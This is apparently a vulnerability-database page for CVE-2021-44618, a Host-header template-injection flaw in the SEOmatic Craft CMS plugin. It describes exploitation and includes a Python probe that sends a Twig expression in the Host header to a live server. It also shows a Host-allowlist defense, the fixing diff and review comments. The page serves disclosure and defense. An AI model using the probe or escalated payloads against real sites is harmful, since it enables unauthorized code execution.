CVE-2021-44618
Description
A Server-side Template Injection (SSTI) vulnerability in Seomatic 3.4.12 allows attackers to execute arbitrary code via a crafted host header.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
A Server-side Template Injection (SSTI) vulnerability exists in nystudio107 SEOmatic, a Craft CMS plugin, in versions before 3.4.12. The flaw is in src/helpers/UrlHelper.php: the siteUrl() and absoluteUrlWithProtocol() functions return URLs whose host component comes from the Host HTTP header and do not sanitize them. Twig template syntax placed in the Host header therefore ends up inside a generated URL and is evaluated when that URL is rendered by Twig, rather than being treated as inert text [1][2].
Exploitation
An attacker exploits this by sending an HTTP request to a Craft CMS site running a vulnerable plugin version with a Host header that contains a Twig template payload. No authentication is required and the request is sent remotely over the network. The crafted header reaches the application whenever the web server forwards requests for unrecognized host names to the Craft site (for example when the site is the default virtual host or is reached by IP address), which is the common case. The server copies the header value into a URL during URL generation, and that URL is then evaluated as Twig, giving server-side template execution [1][3].
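An added example, not code from the SEOmatic project, the advisory or any cited page: a Python probe that builds the request described above with a benign arithmetic Twig expression in the Host header, and a classifier that separates the three outcomes a tester sees (evaluated, reflected verbatim, absent). It assumes, which the page does not state, that the generated site URL is emitted somewhere in the response such as a canonical link or og:url meta tag; the sample response bodies are constructed, not captured from a real site.

```python
"""Probe for Twig evaluation of a Host-header-derived URL.

Added example, not code from the SEOmatic project, the advisory or any cited
page.  Assumptions not stated on the page: the generated site URL is emitted
in the response (e.g. a canonical link or og:url meta tag), and an arithmetic
expression is an adequate, non-destructive probe.
"""
import re
import socket

LEFT, RIGHT = 1337, 7                  # unusual product; avoids chance matches
MARKER = str(LEFT * RIGHT)             # "9359"
PAYLOAD = "{{%d*%d}}" % (LEFT, RIGHT)  # "{{1337*7}}"


def build_probe_request(path="/", payload=PAYLOAD):
    """Raw HTTP/1.1 request with the Twig probe in the Host header.

    Built by hand because most HTTP clients refuse braces in a host name.
    It is meant to be written to a socket opened to the server's address
    directly, so no name-based vhost lookup happens before the application
    sees the Host value.
    """
    lines = [
        "GET %s HTTP/1.1" % path,
        "Host: %s" % payload,
        "User-Agent: ssti-probe/1.0",
        "Accept: text/html",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def classify_response(body, payload=PAYLOAD, marker=MARKER):
    """Classify a response body against the probe.

    'evaluated' : the product appears inside a URL -> Twig ran the payload (SSTI)
    'reflected' : the payload came back verbatim -> Host is trusted for URL
                  generation but was not evaluated (still a Host-injection smell)
    'absent'    : the Host value never reached a generated URL
    """
    in_url = re.compile(r"https?://[^\s\"'<>]*" + re.escape(marker))
    if in_url.search(body):
        return "evaluated"
    if payload in body:
        return "reflected"
    return "absent"


def send_probe(address, port=80, path="/", timeout=5.0):
    """Send the probe to a live host and classify the reply.

    Network call; the offline samples below do not use it.
    """
    with socket.create_connection((address, port), timeout=timeout) as sock:
        sock.sendall(build_probe_request(path))
        chunks = []
        while True:
            data = sock.recv(65536)
            if not data:
                break
            chunks.append(data)
    body = b"".join(chunks).decode("utf-8", errors="replace")
    return classify_response(body)


# Constructed sample bodies (not captured from any real site).
VULNERABLE_BODY = (
    '<head>\n'
    '<link rel="canonical" href="https://9359/">\n'
    '<meta property="og:url" content="https://9359/">\n'
    '</head>'
)
REFLECTED_BODY = '<link rel="canonical" href="https://{{1337*7}}/">'
SAFE_BODY = '<link rel="canonical" href="https://www.example.com/">'


def demo():
    """Classify the three constructed samples; returns the labels in order."""
    return [classify_response(b) for b in (VULNERABLE_BODY, REFLECTED_BODY, SAFE_BODY)]


if __name__ == "__main__":
    print(demo())   # ['evaluated', 'reflected', 'absent']
```

A "reflected" result is not a finding for this CVE but is still worth reporting: it means the site builds links from whatever Host it is given, which is the precondition this bug relied on and a cache-poisoning risk on its own.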
Impact
Successful exploitation allows the attacker to achieve remote code execution (RCE) on the server. The attacker can execute arbitrary Twig templates, which in Craft CMS can lead to complete compromise of the application, including data exfiltration, privilege escalation, and persistent backdoor installation [1][3].
Mitigation
The vulnerability is fixed in commit 0c5c0c0e0cb61000d12ec55ebf174745a5bf6469 ("Sanitize all URLs"), which wraps the return values of siteUrl() and absoluteUrlWithProtocol() in DynamicMeta::sanitizeUrl() [4]. That commit shipped in release 3.4.12 [2], and the GitHub Security Advisory lists versions before 3.4.12 as affected and 3.4.12 as patched; the CVE description names 3.4.12 itself, so treat the advisory's range as authoritative and confirm the installed plugin is 3.4.12 or later (for example with composer show nystudio107/craft-seomatic). No workaround is documented [2][4]. Note that the fix strips template syntax from the generated URL after the Host value has already been used to build it; restricting which Host values reach the application at all (a default virtual host that rejects unknown names, or an explicit allowlist in front of the site) is a reasonable defense-in-depth measure alongside the upgrade.
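The patch above sanitizes the URL after it has been assembled from the Host header. As an added example, not SEOmatic's or Craft CMS's own code, here is the complementary check a deployment can run in a reverse proxy or front controller before any URL is generated: accept only allowlisted host names (handling ports and bracketed IPv6 literals), refuse anything carrying Twig delimiters, and fall back to the configured canonical URL otherwise. The allowlist, the fallback URL and the placement of the check are assumptions for illustration; the page does not document Craft's own Host handling.

```python
"""Allowlist the Host header before it is used to build a site URL.

Added example; not code from SEOmatic or Craft CMS.  The allowlist, the
fallback URL and the idea of running this in a proxy or front controller
are assumptions for illustration.
"""
import ipaddress
import re
from typing import Optional, Tuple

ALLOWED_HOSTS = {"www.example.com", "example.com"}   # assumed deployment names
CANONICAL_BASE = "https://www.example.com"           # assumed configured URL
TWIG_DELIMITERS = ("{{", "}}", "{%", "%}", "{#", "#}")

# RFC 1123 host name: labels of 1-63 alphanumerics or hyphens with no leading
# or trailing hyphen, whole name at most 253 characters.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$"
)


def split_host_port(value: str) -> Tuple[str, Optional[str]]:
    """Split 'host[:port]', accepting bracketed IPv6 literals like [::1]:8080."""
    value = value.strip()
    if value.startswith("["):
        end = value.find("]")
        if end == -1:
            raise ValueError("unterminated IPv6 literal")
        host, rest = value[1:end], value[end + 1:]
        if rest == "":
            return host, None
        if not rest.startswith(":"):
            raise ValueError("text after IPv6 literal")
        return host, rest[1:] or None
    host, sep, port = value.partition(":")
    return host, (port or None) if sep else None


def host_is_allowed(header_value: str, allowed=ALLOWED_HOSTS) -> bool:
    """True only for a well-formed host name (or IP literal) in the allowlist.

    The explicit delimiter check is redundant with the host-name grammar but
    lets a caller log *why* a request was refused.
    """
    if any(d in header_value for d in TWIG_DELIMITERS):
        return False
    try:
        host, port = split_host_port(header_value)
    except ValueError:
        return False
    if port is not None and not (port.isdigit() and 0 < int(port) < 65536):
        return False
    host = host.lower().rstrip(".")
    if not HOSTNAME_RE.match(host):
        try:
            ipaddress.ip_address(host)     # bare IP literal such as ::1
        except ValueError:
            return False
    return host in allowed


def base_url_for_request(header_value: str, scheme: str = "https") -> str:
    """Base URL for generated links: the request's Host only when it is
    allowlisted, otherwise the configured canonical URL."""
    if not host_is_allowed(header_value):
        return CANONICAL_BASE
    host, port = split_host_port(header_value)
    host = host.lower().rstrip(".")
    if ":" in host:                        # re-bracket an IPv6 literal
        host = "[%s]" % host
    return "%s://%s%s" % (scheme, host, ":%s" % port if port else "")


if __name__ == "__main__":
    for h in ("www.example.com", "Example.com:8443", "{{1337*7}}", "evil.example.net"):
        print("%-20s -> %s" % (h, base_url_for_request(h)))
```

Falling back to the configured canonical URL rather than returning an error keeps legitimate direct-to-IP or health-check traffic working while guaranteeing that attacker-chosen text never becomes part of a generated link.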
- [1] NVD - CVE-2021-44618
- [2] Release Version 3.4.12 · nystudio107/craft-seomatic
- [3] GitHub - nystudio107/craft-seomatic: SEOmatic facilitates modern SEO best practices & implementation for Craft CMS 3. It is a turnkey SEO system that is comprehensive, powerful, and flexible.
- [4] Sanitize all URLs · nystudio107/craft-seomatic@0c5c0c0
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| nystudio107/craft-seomatic (Packagist) | < 3.4.12 | 3.4.12 |
Affected products
- Nystudio107/Seomatic
Patches
- 0c5c0c0e0cb6 Sanitize all URLs
1 file changed · +2 −2
src/helpers/UrlHelper.php+2 −2 modified@@ -56,7 +56,7 @@ public static function siteUrl(string $path = '', $params = null, string $scheme return $url; } - return parent::siteUrl($path, $params, $scheme, $siteId); + return DynamicMeta::sanitizeUrl(parent::siteUrl($path, $params, $scheme, $siteId)); } /** @@ -130,7 +130,7 @@ public static function absoluteUrlWithProtocol($url): string $url = rtrim($url, '/'); } - return $url; + return DynamicMeta::sanitizeUrl($url); } /**
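Review bot: in the @@ -56 hunk (siteUrl) only the `parent::siteUrl(...)` return is wrapped in `DynamicMeta::sanitizeUrl()`; the earlier `return $url;` visible in the hunk's leading context is left unsanitized, so either confirm that branch can never carry a Host-derived value or wrap it the same way. The hunk also introduces a call to `DynamicMeta` without adding a `use` statement, so check that the class resolves in UrlHelper.php's namespace (both files live under src/helpers, but the diff does not show the imports).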
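Review bot: in the @@ -130 hunk (absoluteUrlWithProtocol), replacing `return $url;` with `return DynamicMeta::sanitizeUrl($url);` cleans the output after the Host header has already been used to assemble the URL, so whatever sanitizeUrl does not strip still reaches every caller. Neither the +2 −2 diff nor the one-line commit message says what sanitizeUrl removes; document that, and add a regression test that passes a host such as {{7*7}} through both functions and asserts the braces are gone, so a later early-return refactor cannot silently reintroduce the issue.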
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-m3xv-x3ph-mq22 (GHSA; advisory)
- nvd.nist.gov/vuln/detail/CVE-2021-44618 (GHSA; advisory)
- github.com/nystudio107/craft-seomatic/commit/0c5c0c0e0cb61000d12ec55ebf174745a5bf6469 (GHSA; web, fix commit)
- github.com/nystudio107/craft-seomatic/releases/tag/3.4.12 (GHSA; web, release)
News mentions
No linked articles in our index yet.